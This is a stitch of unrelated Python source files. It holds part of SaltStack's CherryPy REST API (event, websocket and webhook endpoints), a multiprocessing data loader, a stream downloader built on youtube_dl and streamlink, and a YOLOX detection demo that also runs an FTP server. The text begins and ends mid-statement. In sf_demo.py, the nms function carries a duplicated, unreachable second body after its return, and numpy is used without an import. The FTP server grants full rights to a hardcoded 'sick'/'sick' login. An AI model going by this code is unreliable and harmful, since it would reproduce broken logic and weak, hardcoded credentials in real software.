cookies['session_id'].value if 'session_id' in cookies else None)
if not self._is_valid_token(auth_token):
raise cherrypy.HTTPError(401)
# Release the session lock before starting the long-running response
cherrypy.session.release_lock()
cherrypy.response.headers['Content-Type'] = 'text/event-stream'
cherrypy.response.headers['Cache-Control'] = 'no-cache'
cherrypy.response.headers['Connection'] = 'keep-alive'
def listen():
'''
An iterator to yield Salt events
'''
event = salt.utils.event.get_event(
'master',
sock_dir=self.opts['sock_dir'],
transport=self.opts['transport'],
opts=self.opts)
stream = event.iter_events(full=True)
yield u'retry: {0}\n'.format(400)
while True:
data = next(stream)
yield u'tag: {0}\n'.format(data.get('tag', ''))
yield u'data: {0}\n\n'.format(json.dumps(data))
return listen()
class WebsocketEndpoint(object):
'''
Open a WebSocket connection to Salt's event bus
The event bus on the Salt master exposes a large variety of things, notably
when executions are started on the master and also when minions ultimately
return their results. This URL provides a real-time window into a running
Salt infrastructure. Uses websocket as the transport mechanism.
.. seealso:: :ref:`events`
'''
exposed = True
_cp_config = dict(LowDataAdapter._cp_config, **{
'response.stream': True,
'tools.encode.encoding': 'utf-8',
# Auth handled manually below
'tools.salt_token.on': True,
'tools.salt_auth.on': False,
'tools.hypermedia_in.on': False,
'tools.hypermedia_out.on': False,
'tools.websocket.on': True,
'tools.websocket.handler_cls': websockets.SynchronizingWebsocket,
})
def __init__(self):
self.opts = cherrypy.config['saltopts']
self.auth = salt.auth.LoadAuth(self.opts)
def GET(self, token=None, **kwargs):
'''
Return a websocket connection of Salt's event stream
.. http:get:: /ws/(token)
:query format_events: The event stream will undergo server-side
formatting if the ``format_events`` URL parameter is included
in the request. This can be useful to avoid formatting on the
client-side:
.. code-block:: bash
curl -NsS <...snip...> localhost:8000/ws?format_events
:reqheader X-Auth-Token: an authentication token from
:py:class:`~Login`.
:status 101: switching to the websockets protocol
:status 401: |401|
:status 406: |406|
**Example request:**
curl -NsSk \\
-H 'X-Auth-Token: ffedf49d' \\
-H 'Host: localhost:8000' \\
-H 'Connection: Upgrade' \\
-H 'Upgrade: websocket' \\
-H 'Origin: https://localhost:8000' \\
-H 'Sec-WebSocket-Version: 13' \\
-H 'Sec-WebSocket-Key: '"$(echo -n $RANDOM | base64)" \\
localhost:8000/ws
.. code-block:: http
GET /ws HTTP/1.1
Connection: Upgrade
Upgrade: websocket
Host: localhost:8000
Origin: https://localhost:8000
Sec-WebSocket-Version: 13
Sec-WebSocket-Key: s65VsgHigh7v/Jcf4nXHnA==
X-Auth-Token: ffedf49d
**Example response**:
.. code-block:: http
HTTP/1.1 101 Switching Protocols
Upgrade: websocket
Connection: Upgrade
Sec-WebSocket-Accept: mWZjBV9FCglzn1rIKJAxrTFlnJE=
Sec-WebSocket-Version: 13
An authentication token **may optionally** be passed as part of the URL
for browsers that cannot be configured to send the authentication
header or cookie:
.. code-block:: bash
curl -NsS <...snip...> localhost:8000/ws/ffedf49d
The event stream can be easily consumed via JavaScript:
.. code-block:: javascript
// Note, you must be authenticated!
var source = new Websocket('ws://localhost:8000/ws/d0ce6c1a');
source.onerror = function(e) { console.debug('error!', e); };
source.onmessage = function(e) { console.debug(e.data); };
source.send('websocket client ready')
source.close();
Or via Python, using the Python module `websocket-client
<https://pypi.python.org/pypi/websocket-client/>`_ for example.
.. code-block:: python
# Note, you must be authenticated!
from websocket import create_connection
ws = create_connection('ws://localhost:8000/ws/d0ce6c1a')
ws.send('websocket client ready')
# Look at https://pypi.python.org/pypi/websocket-client/ for more
# examples.
while listening_to_events:
print ws.recv()
ws.close()
Above examples show how to establish a websocket connection to Salt and
activating real time updates from Salt's event stream by signaling
``websocket client ready``.
'''
# Pulling the session token from an URL param is a workaround for
# browsers not supporting CORS in the EventSource API.
if token:
orig_sesion, _ = cherrypy.session.cache.get(token, ({}, None))
salt_token = orig_sesion.get('token')
else:
salt_token = cherrypy.session.get('token')
# Manually verify the token
if not salt_token or not self.auth.get_tok(salt_token):
raise cherrypy.HTTPError(401)
# Release the session lock before starting the long-running response
cherrypy.session.release_lock()
# A handler is the server side end of the websocket connection. Each
# request spawns a new instance of this handler
handler = cherrypy.request.ws_handler
def event_stream(handler, pipe):
'''
An iterator to return Salt events (and optionally format them)
'''
# blocks until send is called on the parent end of this pipe.
pipe.recv()
event = salt.utils.event.get_event(
'master',
sock_dir=self.opts['sock_dir'],
transport=self.opts['transport'],
opts=self.opts)
stream = event.iter_events(full=True)
SaltInfo = event_processor.SaltInfo(handler)
while True:
data = next(stream)
if data:
try: # work around try to decode catch unicode errors
if 'format_events' in kwargs:
SaltInfo.process(data, salt_token, self.opts)
else:
handler.send('data: {0}\n\n'.format(
json.dumps(data)), False)
except UnicodeDecodeError:
logger.error(
"Error: Salt event has non UTF-8 data:\n{0}"
.format(data))
time.sleep(0.1)
parent_pipe, child_pipe = Pipe()
handler.pipe = parent_pipe
handler.opts = self.opts
# Process to handle async push to a client.
# Each GET request causes a process to be kicked off.
proc = Process(target=event_stream, args=(handler, child_pipe))
proc.start()
class Webhook(object):
'''
A generic web hook entry point that fires an event on Salt's event bus
External services can POST data to this URL to trigger an event in Salt.
For example, Amazon SNS, Jenkins-CI or Travis-CI, or GitHub web hooks.
.. note:: Be mindful of security
Salt's Reactor can run any code. A Reactor SLS that responds to a hook
event is responsible for validating that the event came from a trusted
source and contains valid data.
**This is a generic interface and securing it is up to you!**
This URL requires authentication however not all external services can
be configured to authenticate. For this reason authentication can be
selectively disabled for this URL. Follow best practices -- always use
SSL, pass a secret key, configure the firewall to only allow traffic
from a known source, etc.
The event data is taken from the request body. The
:mailheader:`Content-Type` header is respected for the payload.
The event tag is prefixed with ``salt/netapi/hook`` and the URL path is
appended to the end. For example, a ``POST`` request sent to
``/hook/mycompany/myapp/mydata`` will produce a Salt event with the tag
``salt/netapi/hook/mycompany/myapp/mydata``.
The following is an example ``.travis.yml`` file to send notifications to
Salt of successful test runs:
.. code-block:: yaml
language: python
script: python -m unittest tests
after_success:
- |
curl -sSk https://saltapi-url.example.com:8000/hook/travis/build/success \
-d branch="${TRAVIS_BRANCH}" \
-d commit="${TRAVIS_COMMIT}"
.. seealso:: :ref:`events`, :ref:`reactor`
'''
exposed = True
tag_base = ['salt', 'netapi', 'hook']
_cp_config = dict(LowDataAdapter._cp_config, **{
# Don't do any lowdata processing on the POST data
'tools.lowdata_fmt.on': True,
# Auth can be overridden in __init__().
'tools.salt_token.on': True,
'tools.salt_auth.on': True,
})
def __init__(self):
self.opts = cherrypy.config['saltopts']
self.event = salt.utils.event.get_event(
'master',
sock_dir=self.opts['sock_dir'],
transport=self.opts['transport'],
opts=self.opts,
listen=False)
if cherrypy.config['apiopts'].get('webhook_disable_auth'):
self._cp_config['tools.salt_token.on'] = False
self._cp_config['tools.salt_auth.on'] = False
def POST(self, *args, **kwargs):
'''
Fire an event in Salt with a custom event tag and data
.. http:post:: /hook
:status 200: |200|
:status 401: |401|
:status 406: |406|
:status 413: request body is too large
**Example request:**
.. code-block:: bash
curl -sS localhost:8000/hook -d foo='Foo!' -d bar='Bar!'
.. code-block:: http
POST /hook HTTP/1.1
Host: localhost:8000
Content-Length: 16
Content-Type: application/x-www-form-urlencoded
foo=Foo&bar=Bar!
**Example response**:
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 14
Content-Type: application/json
{"success": true}
As a practical example, an internal continuous-integration build
server could send an HTTP POST request to the URL
``https://localhost:8000/hook/mycompany/build/success`` which contains
the result of a build and the SHA of the version that was built as
JSON. That would then produce the following event in Salt that could be
used to kick off a deployment via Salt's Reactor::
Event fired at Fri Feb 14 17:40:11 2014
*************************
Tag: salt/netapi/hook/mycompany/build/success
Data:
{'_stamp': '2014-02-14_17:40:11.440996',
'headers': {
'X-My-Secret-Key': 'F0fAgoQjIT@W',
'Content-Length': '37',
'Content-Type': 'application/json',
'Host': 'localhost:8000',
'Remote-Addr': '127.0.0.1'},
'post': {'revision': 'aa22a3c4b2e7', 'result': True}}
Salt's Reactor could listen for the event:
.. code-block:: yaml
reactor:
- 'salt/netapi/hook/mycompany/build/*':
- /srv/reactor/react_ci_builds.sls
And finally deploy the new build:
.. code-block:: yaml
{% set secret_key = data.get('headers', {}).get('X-My-Secret-Key') %}
{% set build = data.get('post', {}) %}
{% if secret_key == 'F0fAgoQjIT@W' and build.result == True %}
deploy_my_app:
cmd.state.sls:
- tgt: 'application*'
- arg:
- myapp.deploy
- kwarg:
pillar:
revision: {{ revision }}
{% endif %}
'''
tag = '/'.join(itertools.chain(self.tag_base, args))
data = cherrypy.serving.request.unserialized_data
raw_body = cherrypy.serving.request.raw_body
headers = dict(cherrypy.request.headers)
ret = self.event.fire_event({
'body': raw_body,
'post': data,
'headers': headers,
}, tag)
return {'success': ret}
class Stats(object):
'''
Expose statistics on the running CherryPy server
'''
exposed = True
_cp_config = dict(LowDataAdapter._cp_config, **{
'tools.salt_token.on': True,
'tools.salt_auth.on': True,
})
def GET(self):
'''
Return a dump of statistics collected from the CherryPy server
.. http:get:: /stats
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:resheader Content-Type: |res_ct|
:status 200: |200|
:status 401: |401|
:status 406: |406|
'''
if hasattr(logging, 'statistics'):
return cpstats.extrapolate_statistics(logging.statistics)
return {}
class App(object):
'''
Class to serve HTML5 apps
'''
exposed = True
def GET(self, *args):
'''
Serve a single static file ignoring the remaining path
This is useful in combination with a browser-based app using the HTML5
history API.
.. http::get:: /app
:reqheader X-Auth-Token: |req_token|
:status 200: |200|
:status 401: |401|
'''
apiopts = cherrypy.config['apiopts']
return cherrypy.lib.static.serve_file(apiopts['app'])
class API(object):
'''
Collect configuration and URL map for building the CherryPy app
'''
url_map = {
'index': LowDataAdapter,
'login': Login,
'logout': Logout,
'minions': Minions,
'run': Run,
'jobs': Jobs,
'keys': Keys,
'events': Events,
'stats': Stats,
}
def _setattr_url_map(self):
'''
Set an attribute on the local instance for each key/val in url_map
CherryPy uses class attributes to resolve URLs.
'''
for url, cls in six.iteritems(self.url_map):
setattr(self, url, cls())
def _update_url_map(self):
'''
Assemble any dynamic or configurable URLs
'''
if HAS_WEBSOCKETS:
self.url_map.update({
'ws': WebsocketEndpoint,
})
# Allow the Webhook URL to be overridden from the conf.
self.url_map.update({
self.apiopts.get('webhook_url', 'hook').lstrip('/'): Webhook,
})
# Enable the single-page JS app URL.
if 'app' in self.apiopts:
self.url_map.update({
self.apiopts.get('app_path', 'app').lstrip('/'): App,
})
def __init__(self):
self.opts = cherrypy.config['saltopts']
self.apiopts = cherrypy.config['apiopts']
self._update_url_map()
self._setattr_url_map()
def get_conf(self):
'''
Combine the CherryPy configuration with the rest_cherrypy config values
pulled from the master config and return the CherryPy configuration
'''
conf = {
'global': {
'server.socket_host': self.apiopts.get('host', '0.0.0.0'),
'server.socket_port': self.apiopts.get('port', 8000),
'server.thread_pool': self.apiopts.get('thread_pool', 100),
'server.socket_queue_size': self.apiopts.get('queue_size', 30),
'engine.timeout_monitor.on': self.apiopts.get(
'expire_responses', True),
'max_request_body_size': self.apiopts.get(
'max_request_body_size', 1048576),
'debug': self.apiopts.get('debug', False),
},
'/': {
'request.dispatch': cherrypy.dispatch.MethodDispatcher(),
'tools.trailing_slash.on': True,
'tools.gzip.on': True,
'tools.cpstats.on': self.apiopts.get('collect_stats', False),
'tools.cors_tool.on': True,
},
}
if self.apiopts.get('debug', False) is False:
conf['global']['environment'] = 'production'
# Serve static media if the directory has been set in the configuration
if 'static' in self.apiopts:
conf[self.apiopts.get('static_path', '/static')] = {
'tools.staticdir.on': True,
'tools.staticdir.dir': self.apiopts['static'],
}
# Add to global config
cherrypy.config.update(conf['global'])
return conf
def get_app(opts):
'''
Returns a WSGI app and a configuration dictionary
'''
apiopts = opts.get(__name__.rsplit('.', 2)[-2], {}) # rest_cherrypy opts
# Add Salt and salt-api config options to the main CherryPy config dict
cherrypy.config['saltopts'] = opts
cherrypy.config['apiopts'] = apiopts
root = API() # cherrypy app
cpyopts = root.get_conf() # cherrypy app opts
return root, apiopts, cpyopts
|
data_loader.py
|
from multiprocessing import Process, SimpleQueue, Value
import time
import random
import numpy as np
__all__ = ["DataLoader"]
class StopGenerator:
def __init__(self, pid=None):
self.pid = pid
def default_collate(batch):
if not batch or not isinstance(batch, list):
return batch
if isinstance(batch[0], tuple):
result = [[] for _ in range(len(batch[0]))]
for items in batch:
for idx, item in enumerate(items):
result[idx].append(item)
result_cvt = []
for i in range(len(result)):
if isinstance(result[i][0], np.ndarray):
result_cvt.append(np.stack(result[i]))
elif isinstance(result[i][0], (float, int)):
result_cvt.append(np.array(result[i]))
else:
result_cvt.append(result[i])
return tuple(result_cvt)
elif isinstance(batch[0], np.ndarray):
return np.stack(batch)
elif isinstance(batch[0], (float, int)):
return np.array(batch)
return batch
class DataLoader:
def __init__(self, generator, batch_size=0, maxsize=-1, shuffle=False, num_worker=1, collate_fn=default_collate,
seed=None):
self.generator = generator
self.batch_size = max(0, int(batch_size))
self.num_worker = max(1, int(num_worker))
self.maxsize = min(1, self.batch_size) * self.num_worker * 2 if maxsize < 0 else maxsize
self.collate_fn = collate_fn
self.shuffle = shuffle
self.seed = seed
def __iter__(self):
def sample_generator(generator, data_queue, count, tid):
if self.seed is not None:
random.seed(self.seed + tid)
np.random.seed(self.seed + tid)
idx_ls = list(range(len(generator)))
if self.shuffle:
random.shuffle(idx_ls)
for i in idx_ls:
if i % self.num_worker != tid:
continue
while count.value >= self.maxsize > 0:
time.sleep(0.02)
continue
data_queue.put(generator[i])
with count.get_lock():
count.value += 1
data_queue.put(StopGenerator(pid=tid))
with count.get_lock():
count.value += 1
data_queue = SimpleQueue()
count = Value('i', 0)
process_map = dict()
for tid in range(self.num_worker):
process = Process(target=sample_generator, args=(self.generator, data_queue, count, tid))
process.daemon = True
process.start()
process_map[tid] = process
def single_generator():
while len(process_map) > 0:
item = data_queue.get()
with count.get_lock():
count.value -= 1
if isinstance(item, StopGenerator):
del process_map[item.pid]
continue
yield item
def parallel_generator():
result = []
while len(process_map) > 0:
item = data_queue.get()
with count.get_lock():
count.value -= 1
if isinstance(item, StopGenerator):
del process_map[item.pid]
continue
result.append(item)
if len(result) >= self.batch_size:
if self.collate_fn is not None:
result = self.collate_fn(result)
yield result
result = []
return parallel_generator() if self.batch_size else single_generator()
|
__init__.py
|
import os
import re
import subprocess
import sys
import time
from threading import Thread, Event
import psutil
import streamlink
import youtube_dl
from common import logger
from common.timer import Timer
class DownloadBase:
url_list = None
def __init__(self, fname, url, suffix=None):
self.fname = fname
self.url = url
self.suffix = suffix
self.flag = None
self.ydl_opts = {}
def check_stream(self):
logger.debug(self.fname)
def download(self):
pass
def run(self):
file_name = self.file_name
self.ydl_opts = {'outtmpl': file_name}
if self.check_stream():
try:
logger.info('开始下载%s:%s' % (self.__class__.__name__, self.fname))
pid = os.getpid()
# t = Thread(target=self.kill_child_processes, args=(pid, file_name))
monitor = Monitoring(pid, file_name)
self.flag = monitor.flag
t = Thread(target=monitor.start)
t.start()
retval = self.download()
self.rename(file_name)
monitor.stop()
if retval != 0:
logger.info('准备递归下载')
self.run()
else:
logger.info('下载完成' + self.fname)
# except youtube_dl.utils.DownloadError:
# self.rename(file_name)
# logger.info('准备递归下载')
# self.run()
# except:
# logger.exception('?')
finally:
logger.info('退出下载')
return
@staticmethod
def rename(file_name):
try:
os.rename(file_name + '.part', file_name)
logger.info('更名{0}为{1}'.format(file_name + '.part', file_name))
except FileNotFoundError:
logger.info('FileNotFoundError:' + file_name)
except FileExistsError:
os.rename(file_name + '.part', file_name)
logger.info('FileExistsError:更名{0}为{1}'.format(file_name + '.part', file_name))
@property
def file_name(self):
file_name = '%s%s.%s' % (self.fname, str(time.time())[:10], self.suffix)
return file_name
class YDownload(DownloadBase):
# url_list = None
def __init__(self, fname, url, suffix='flv'):
super().__init__(fname, url, suffix)
def check_stream(self):
try:
self.get_sinfo()
return True
except youtube_dl.utils.DownloadError:
# logger.debug('%s未开播或读取下载信息失败' % self.key)
logger.debug('%s未开播或读取下载信息失败' % self.fname)
return False
def get_sinfo(self):
info_list = []
with youtube_dl.YoutubeDL() as ydl:
# cu = self.url.get(self.__class__.__name__)
if self.url:
info = ydl.extract_info(self.url, download=False)
else:
logger.debug('%s不存在' % self.__class__.__name__)
return
for i in info['formats']:
info_list.append(i['format_id'])
logger.debug(info_list)
return info_list
def download(self):
try:
self.dl()
except youtube_dl.utils.DownloadError:
return 1
return 0
def dl(self):
with youtube_dl.YoutubeDL(self.ydl_opts) as ydl:
# ydl.download([self.url[self.__class__.__name__]])
ydl.download([self.url])
class SDownload(DownloadBase):
def __init__(self, fname, url, suffix='mp4'):
super().__init__(fname, url, suffix)
self.stream = None
def check_stream(self):
logger.debug(self.fname)
streams = streamlink.streams(self.url)
try:
if streams:
self.stream = streams["best"]
fd = self.stream.open()
fd.close()
return True
except streamlink.StreamlinkError:
return
def download(self):
# fd = stream.open()
try:
with self.stream.open() as fd:
with open(self.ydl_opts['outtmpl'] + '.part', 'wb') as file:
for f in fd:
file.write(f)
if self.flag.is_set():
# self.flag.clear()
return 1
return 0
except OSError:
self.rename(self.ydl_opts['outtmpl'])
raise
# ffmpeg.exe -i http://vfile1.grtn.cn/2018/1542/0254/3368/154202543368.ssm/154202543368.m3u8
# -c copy -bsf:a aac_adtstoasc -movflags +faststart output.mp4
class FFmpegdl(DownloadBase):
def download(self):
args = ['ffmpeg', '-y', '-i', self.ydl_opts['absurl'], '-c', 'copy', '-f', self.suffix,
self.ydl_opts['outtmpl'] + '.part']
proc = subprocess.Popen(args, stdin=subprocess.PIPE)
try:
retval = proc.wait()
except KeyboardInterrupt:
if sys.platform != 'win32':
proc.communicate(b'q')
raise
return retval
class BatchCheckBase:
def __init__(self, pattern_id, urls):
self.usr_dict = {}
self.usr_list = []
self.pattern_id = pattern_id
for url in urls:
self.get_id(url)
def get_id(self, url):
m = re.match(self.pattern_id, url)
if m:
usr_id = m.group('id')
self.usr_dict[usr_id.lower()] = url
self.usr_list.append(usr_id)
def check(self):
pass
class Monitoring(Timer):
def __init__(self, parent_pid, file_name):
super().__init__(func=self.kill_child_processes)
self.parent = self.children = self.numc = None
self.parent_pid = parent_pid
self.file_name = file_name + '.part'
self.last_file_size = 0.0
self.flag = Event()
def terminate(self):
if self.numc == 0:
logger.error("ChildrenProcess doesn't exist")
else:
for process in self.children:
process.terminate()
# logger.info('下载卡死' + self.file_name)
def get_process(self, parent_pid):
try:
parent = psutil.Process(parent_pid)
except psutil.NoSuchProcess:
self.stop()
logger.error("Process doesn't exist")
return
children = parent.children(recursive=True)
numc = len(children)
return parent, children, numc
def kill_child_processes(self):
file_size = os.path.getsize(self.file_name) / 1024 / 1024 / 1024
if file_size <= self.last_file_size:
logger.error('下载卡死' + self.file_name)
if self.numc == 0:
self.parent.terminate()
else:
self.terminate()
time.sleep(1)
if os.path.isfile(self.file_name):
logger.info('卡死下载进程可能未成功退出')
return
else:
self.stop()
logger.info('卡死下载进程成功退出')
return
self.last_file_size = file_size
if file_size >= 2.5:
if self.numc == 0:
self.flag.set()
else:
self.terminate()
logger.info('分段下载' + self.file_name)
def __timer(self):
logger.info('获取到{0},{1}'.format(self.parent_pid, self.file_name))
retry = 0
while not self._flag.wait(self.interval):
self.parent, self.children, self.numc = self.get_process(self.parent_pid)
if os.path.isfile(self.file_name):
self._func(*self._args, **self._kwargs)
else:
logger.info('%s不存在' % self.file_name)
if retry >= 2:
self.terminate()
logger.info('结束进程,找不到%s' % self.file_name)
return
retry += 1
# logger.info('监控<%s>线程退出' % self.file_name)
def start(self):
try:
self.__timer()
finally:
logger.info('退出监控<%s>线程' % self.file_name)
def match1(text, *patterns):
if len(patterns) == 1:
pattern = patterns[0]
match = re.search(pattern, text)
if match:
return match.group(1)
else:
return None
else:
ret = []
for pattern in patterns:
match = re.search(pattern, text)
if match:
ret.append(match.group(1))
return ret
|
sf_demo.py
|
import socket
from socket import *
from threading import Thread
from pyftpdlib.authorizers import DummyAuthorizer
from pyftpdlib.handlers import FTPHandler
from pyftpdlib.servers import FTPServer
import random
import argparse
import os
import time
from loguru import logger
import cv2
import torch
from yolox.data.data_augment import ValTransform
from yolox.data.datasets import COCO_CLASSES
from yolox.exp import get_exp
from yolox.utils import fuse_model, get_model_info, postprocess, vis
IMAGE_EXT = [".jpg", ".jpeg", ".webp", ".bmp", ".png"]
logger.add('{time}.log', rotation='00:00',retention="10 days")
# 新建一个用户组
authorizer = DummyAuthorizer()
# 将用户名,密码,指定目录,权限 添加到里面
if not os.path.exists("F:\\FTP Root\\ICR_EXT"):
os.mkdir("F:\\FTP Root\\ICR_EXT")
authorizer.add_user("sick", "sick", "F:\\FTP Root\\ICR_EXT", perm="elradfmw") # adfmw
handler = FTPHandler
handler.authorizer = authorizer
handler.passive_ports = range(5001, 5510)
controler_tcpCliSock = socket(AF_INET, SOCK_STREAM)
HOST_controler = '192.168.100.101' # The remote host
PORT_controler = 3500 # The same port as used by the server
# imagelist = queue.Queue()
def make_parser():
parser = argparse.ArgumentParser("YOLOX Demo!")
parser.add_argument(
"--demo", default="image", help="demo type, eg. image, video and webcam"
)
parser.add_argument("-expn", "--experiment-name", type=str, default=None)
parser.add_argument("-n", "--name", type=str, default="yolox-s", help="model name")
parser.add_argument(
"--path", default="./assets/dog.jpg", help="path to images or video"
)
parser.add_argument("--camid", type=int, default=0, help="webcam demo camera id")
parser.add_argument(
"--save_result",
action="store_true",
help="whether to save the inference result of image/video",
)
# exp file
parser.add_argument(
"-f",
"--exp_file",
default=None,
type=str,
help="pls input your experiment description file",
)
parser.add_argument("-c", "--ckpt", default="best_ckpt.pth", type=str, help="ckpt for eval")
parser.add_argument(
"--device",
default="gpu",
type=str,
help="device to run our model, can either be cpu or gpu",
)
parser.add_argument("--conf", default=0.85, type=float, help="test conf")
parser.add_argument("--nms", default=0.45, type=float, help="test nms threshold")
parser.add_argument("--tsize", default=640, type=int, help="test img size")
parser.add_argument(
"--fp16",
dest="fp16",
default=False,
action="store_true",
help="Adopting mix precision evaluating.",
)
parser.add_argument(
"--legacy",
dest="legacy",
default=False,
action="store_true",
help="To be compatible with older versions",
)
parser.add_argument(
"--fuse",
dest="fuse",
default=False,
action="store_true",
help="Fuse conv and bn for testing.",
)
parser.add_argument(
"--trt",
dest="trt",
default=False,
action="store_true",
help="Using TensorRT model for testing.",
)
return parser
def image_demo(predictor, vis_folder, path, current_time, save_result):
img_path = handler.imagelist.get()
time.sleep(0.01)
t1 = time.time()
outputs, img_info = predictor.inference(img_path)
# result_image = predictor.visual(outputs[0], img_info, predictor.confthre)
t2 = time.time()
ms = (t2 - t1) * 1000.0 / 1
logger.info("predict image_name: {} ".format(img_info['file_name']))
logger.info("predict time: {} ms one image".format(ms))
#print("predict time: {} ms per batch image".format(ms))
Track_id=img_info['file_name'].split('_')[6]
label=1
if len(outputs)>0:
if outputs[0] is not None :
if outputs[0].shape[0]>1:
picked_boxes= nms(outputs[0])
if len(picked_boxes)>1:
label = 2
output=outputs[0]
bboxes=output[:,0:4]
cls=output[:,6]
scores=output[:,4]*output[:,5]
logger.info("predict bboxes: {} ".format(bboxes))
logger.info("predict scores: {} ".format(scores))
logger.info("predict result: {} ".format(label))
send_out='\u0002'+str(Track_id)+';'+str(label)+'\u0003'
controler_tcpCliSock.send(bytes(send_out, 'utf8'))
# save_file_name = img_path.split("_EEEEEEEEEEEE_")[-1]
# img_path="F:/my_code/2021/sf/1027/"+save_file_name
# # print("img_name:{}".format(save_file_name))
# # logger.info("Saving detection result in {}".format(save_file_name))
# cv2.imwrite(img_path, result_image)
# return result_image
def nms(bboxes):
"""非极大抑制过程
:param bboxes: 同类别候选框坐标
:return:
"""
bboxes = np.array(bboxes.cpu())
# 取出n个的极坐标点
x1 = bboxes[:, 0]
y1 = bboxes[:, 1]
x2 = bboxes[:, 2]
y2 = bboxes[:, 3]
scores = bboxes[:, 4] * bboxes[:, 5]
# 2、对候选框进行NMS筛选
# 从大到小排列,取index
order = scores.argsort()[::-1]
areas = (x2 - x1) * (y2 - y1)
# 2、对候选框进行NMS筛选
# 返回的框坐标和分数
picked_boxes = []
while order.size > 0:
# 将当前置信度最大的框加入返回值列表中
index = order[-1]
picked_boxes.append(bboxes[index])
# 获取当前置信度最大的候选框与其他任意候选框的相交面积
x11 = np.maximum(x1[index], x1[order[:-1]])
y11 = np.maximum(y1[index], y1[order[:-1]])
x22 = np.minimum(x2[index], x2[order[:-1]])
y22 = np.minimum(y2[index], y2[order[:-1]])
# 计算当前矩形框与其余框的比值
rate = areas[index] / areas[order[:-1]]
# 计算其余框于u当前框的比值
rate1 = areas[order[:-1]] / areas[index]
w = np.maximum(0.0, x22 - x11)
h = np.maximum(0.0, y22 - y11)
intersection = w * h
# 利用相交的面积和两个框自身的面积计算框的交并比, 保留大于阈值的框
ratio = intersection / (areas[index] + areas[order[:-1]] - intersection)
# rate==ratio表示包含关系,保留不为包含关系的框
keep_boxes_indics = np.where(abs(ratio - rate)>0.01)
keep_boxes_indics1 = np.where(abs(ratio - rate1)>0.01)
if keep_boxes_indics[0].__len__() < keep_boxes_indics1[0].__len__():
order = order[keep_boxes_indics]
else:
order = order[keep_boxes_indics1]
return picked_boxes
"""非极大抑制过程
:param bboxes: 同类别候选框坐标
:return:
"""
bboxes = np.array(bboxes.cpu())
# 取出n个的极坐标点
x1 = bboxes[:, 0]
y1 = bboxes[:, 1]
x2 = bboxes[:, 2]
y2 = bboxes[:, 3]
# 2、对候选框进行NMS筛选
# 返回的框坐标和分数
picked_boxes = []
# 对置信度进行排序, 获取排序后的下标序号, argsort默认从小到大排序
order = np.argsort(np.ones(len(bboxes)))
areas = (x2 - x1) * (y2 - y1)
while order.size > 1:
# 将当前置信度最大的框加入返回值列表中
index = order[-1]
picked_boxes.append(bboxes[index])
# 获取当前置信度最大的候选框与其他任意候选框的相交面积
x11 = np.maximum(x1[index], x1[order[:-1]])
y11 = np.maximum(y1[index], y1[order[:-1]])
x22 = np.minimum(x2[index], x2[order[:-1]])
y22 = np.minimum(y2[index], y2[order[:-1]])
# 计算当前矩形框与其余框的比值
rate = areas[index] / areas[order[:-1]]
# 计算其余框于u当前框的比值
rate1 = areas[order[:-1]] / areas[index]
w = np.maximum(0.0, x22 - x11)
h = np.maximum(0.0, y22 - y11)
intersection = w * h
# 利用相交的面积和两个框自身的面积计算框的交并比, 保留大于阈值的框
ratio = intersection / (areas[index] + areas[order[:-1]] - intersection)
# rate==ratio表示包含关系,保留不为包含关系的框
keep_boxes_indics = np.where(ratio != rate)
keep_boxes_indics1 = np.where(ratio != rate1)
if keep_boxes_indics.__len__() < keep_boxes_indics1.__len__():
order = order[keep_boxes_indics]
else:
order = order[keep_boxes_indics1]
return picked_boxes
class Predictor(object):
def __init__(
self,
model,
exp,
cls_names=COCO_CLASSES,
trt_file=None,
decoder=None,
device="cpu",
fp16=False,
legacy=False,
):
self.model = model
self.cls_names = cls_names
self.decoder = decoder
self.num_classes = exp.num_classes
self.confthre = exp.test_conf
self.nmsthre = exp.nmsthre
self.test_size = exp.test_size
self.device = device
self.fp16 = fp16
self.preproc = ValTransform(legacy=legacy)
if trt_file is not None:
from torch2trt import TRTModule
model_trt = TRTModule()
model_trt.load_state_dict(torch.load(trt_file))
x = torch.ones(1, 3, exp.test_size[0], exp.test_size[1]).cuda()
self.model(x)
self.model = model_trt
def inference(self, img):
img_info = {"id": 0}
if isinstance(img, str):
img_info["file_name"] = os.path.basename(img)
img = cv2.imread(img)
else:
img_info["file_name"] = None
height, width = img.shape[:2]
img_info["height"] = height
img_info["width"] = width
img_info["raw_img"] = img
ratio = min(self.test_size[0] / img.shape[0], self.test_size[1] / img.shape[1])
img_info["ratio"] = ratio
img, _ = self.preproc(img, None, self.test_size)
img = torch.from_numpy(img).unsqueeze(0)
img = img.float()
if self.device == "gpu":
img = img.cuda()
if self.fp16:
img = img.half() # to FP16
with torch.no_grad():
t0 = time.time()
outputs = self.model(img)
if self.decoder is not None:
outputs = self.decoder(outputs, dtype=outputs.type())
outputs = postprocess(
outputs, self.num_classes, self.confthre,
self.nmsthre, class_agnostic=True
)
logger.info("Infer time: {:.4f}s".format(time.time() - t0))
return outputs, img_info
def visual(self, output, img_info, cls_conf=0.35):
ratio = img_info["ratio"]
img = img_info["raw_img"]
if output is None:
return img
output = output.cpu()
bboxes = output[:, 0:4]
# preprocessing: resize
bboxes /= ratio
cls = output[:, 6]
scores = output[:, 4] * output[:, 5]
vis_res = vis(img, bboxes, scores, cls, cls_conf, self.cls_names)
return vis_res
def main(exp, args):
if not args.experiment_name:
args.experiment_name = exp.exp_name
file_name = os.path.join(exp.output_dir, args.experiment_name)
os.makedirs(file_name, exist_ok=True)
vis_folder = None
if args.save_result:
vis_folder = os.path.join(file_name, "vis_res")
os.makedirs(vis_folder, exist_ok=True)
if args.trt:
args.device = "gpu"
logger.info("Args: {}".format(args))
if args.conf is not None:
exp.test_conf = args.conf
if args.nms is not None:
exp.nmsthre = args.nms
if args.tsize is not None:
exp.test_size = (args.tsize, args.tsize)
model = exp.get_model()
logger.info("Model Summary: {}".format(get_model_info(model, exp.test_size)))
if args.device == "gpu":
model.cuda()
if args.fp16:
model.half() # to FP16
model.eval()
if not args.trt:
if args.ckpt is None:
ckpt_file = os.path.join(file_name, "best_ckpt.pth")
else:
ckpt_file = args.ckpt
logger.info("loading checkpoint")
ckpt = torch.load(ckpt_file, map_location="cpu")
# load the model state dict
model.load_state_dict(ckpt["model"])
logger.info("loaded checkpoint done.")
if args.fuse:
logger.info("\tFusing model...")
model = fuse_model(model)
if args.trt:
assert not args.fuse, "TensorRT model is not support model fusing!"
trt_file = os.path.join(file_name, "model_trt.pth")
assert os.path.exists(
trt_file
